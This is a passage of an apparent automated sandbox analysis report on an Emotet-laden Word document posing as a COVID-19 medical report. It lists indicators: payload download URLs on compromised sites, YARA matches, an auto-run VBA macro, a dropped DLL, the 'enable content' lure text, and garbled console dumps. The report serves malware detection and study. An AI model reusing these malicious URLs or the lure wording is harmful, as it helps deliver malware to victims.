                      Source: powershell.exe, 00000005.00000002.2106818585.0000000003B54000.00000004.00000001.sdmpString found in binary or memory: http://cab.mH
                      Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://cab.mykfn.com
                      Source: powershell.exe, 00000005.00000002.2107203332.000000001B538000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmpString found in binary or memory: http://cab.mykfn.com/admin/X/
                      Source: powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmpString found in binary or memory: http://cambiasuhistoria.growlab.es/wp-content/hGhY2/
                      Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://cambiasuhistoria.growlab.es/wp-content/hGhY2/P
                      Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmpString found in binary or memory: http://gocphongthe.com/wp-content/lMMC/
                      Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmpString found in binary or memory: http://ie-best.net
                      Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmpString found in binary or memory: http://ie-best.net/online-timer-kvhxz/ilXL/
                      Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmpString found in binary or memory: http://java.c
                      Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: powershell.exe, 00000005.00000002.2098069064.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2122352359.0000000002820000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmpString found in binary or memory: http://vanddnabhargave.com
                      Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmpString found in binary or memory: http://vanddnabhargave.com/asset/W9o/
                      Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2098069064.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2122352359.0000000002820000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmpString found in binary or memory: http://www.letscompareonline.com/de.letscompareonline.com/wYd/
                      Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                      Source: powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/cclea7
                      Source: rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000008.00000002.2121216068.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2110577655.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2145222435.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2334223344.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2121359913.0000000000700000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2122851678.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2145232978.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2155705121.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2335867328.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2110590102.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2155718494.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2131220245.0000000000150000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2131240758.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2334238430.0000000000180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2149683472.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2133987769.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2156224518.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.290000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.180000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.290000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.170000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.700000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.180000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.170000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
                      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available fOr protected documents. You have to press "E
                      Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 6,262 N@m 13 ;a 1009
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document
                      Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available fOr protected documents. You have to press "ENA
                      Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document
                      Powershell drops PE fileShow sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dllJump to dropped file
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5949
                      Source: unknownProcess created: Commandline size = 5848
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5848
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Dgmlr\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B0D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000DBB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014602
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002814
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001821E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018A24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DA27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A82A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B22A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000422B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001A02C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001A82C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E42E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000BA46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F249
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018C4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001505A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001662
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001664
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D87D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010082
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018489
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002C93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10011494
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000AE9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100026A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008EA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100112B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000BEBD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100048C7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004AD3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100068D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100084D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100042DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010CE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100038E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10012CE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001A2E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E8F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001EF9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10006AFC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007306
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CF07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003F0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10013F16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018721
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019726
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C92D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001732F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D535
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10016334
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014D39
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003743
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F54C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001894D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010950
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10011F54
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CB58
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001BF69
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007B6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A16A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019D6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001197B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DD80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10017B8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B598
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001539F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000799F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E9A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000EBA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100021C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C1C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100107D3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100095DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D5DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100129E3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F7EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100033F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A7FA
                      Source: IU-8549 Medical report COVID-19.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module Sky5mdbfre3xe7q8, Function Document_open
                      Source: IU-8549 Medical report COVID-19.docOLE indicator, VBA macros: true
                      Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.evad.winDOC@20/8@6/100
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$-8549 Medical report COVID-19.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBAD6.tmpJump to behavior
                      Source: IU-8549 Medical report COVID-19.docOLE indicator, Word Document stream: true
                      Source: IU-8549 Medical report COVID-19.docOLE document summary: title field not present or empty
                      Source: IU-8549 Medical report COVID-19.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ........................................ .........................%.....H.%.............#...............................h.......5kU.......%.....
                      Source: C:\Windows\System32\msg.exeConsole Write: ................................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.........%.....L.................%.....
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........m.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................b.j......................v.............}..v....p.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................b.j..... v...............v.............}..v............0.................m.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................c.j......................v.............}..v............0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................c.j....x.m...............v.............}..v....`.......0.................m.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............Fc.j......................v.............}..v............0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............Fc.j..... v...............v.............}..v............0...............H.m.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............v..j....`Fm...............v.............}..v............0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j......................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C...............v..j....`Fm...............v.............}..v............0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j......................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O...............v..j....`Fm...............v.............}..v............0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j......................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v....0.......0................Cm.....(.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j......................v.............}..v....h.......0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.6.7.............}..v....x.......0................Cm.....$.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j....0.................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s...............v..j....`Fm...............v.............}..v....x.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j....0.................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................
